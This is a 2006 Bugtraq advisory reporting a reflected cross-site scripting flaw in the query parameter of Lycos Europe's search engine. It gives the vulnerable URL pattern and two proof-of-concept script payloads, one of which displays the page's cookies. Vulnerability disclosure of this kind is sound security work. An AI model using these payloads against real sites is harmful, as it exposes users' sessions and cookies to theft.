
Date: 10 Jun 2006 19:11:21 -0000
From: admin@...orsecurity.de
To: bugtraq@...urityfocus.com
Subject: Lycos.com - XSS vulnerability


Lycos.com - XSS vulnerability
----------------------------------------------
Type: Cross site scripting

Date: June, 10th 2006
----------------------------------------------


Credits:
----------------------------------------------
Discovered by: David "Aesthetico" Vieira-Kurz
http://www.majorsecurity.de
----------------------------------------------


Vulnerability:
----------------------------------------------
I found a bug in the search-engine of Lycos Europe("http://search.lycos.com").
It is vulnerable for cross site scripting.

Sending a malicious code will result a code working on the page that pops up...

/?loc=searchbox&tab=web&adf=Off&query=[XSS CODE HERE]

This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.


Examples:
----------------------------------------------
/?loc=searchbox&tab=web&adf=Off&query=<script>alert("MajorSecurity")</script>
/?loc=searchbox&tab=web&adf=Off&query=%3Cscript%3Ealert(document.cookie)%3C/script%3E


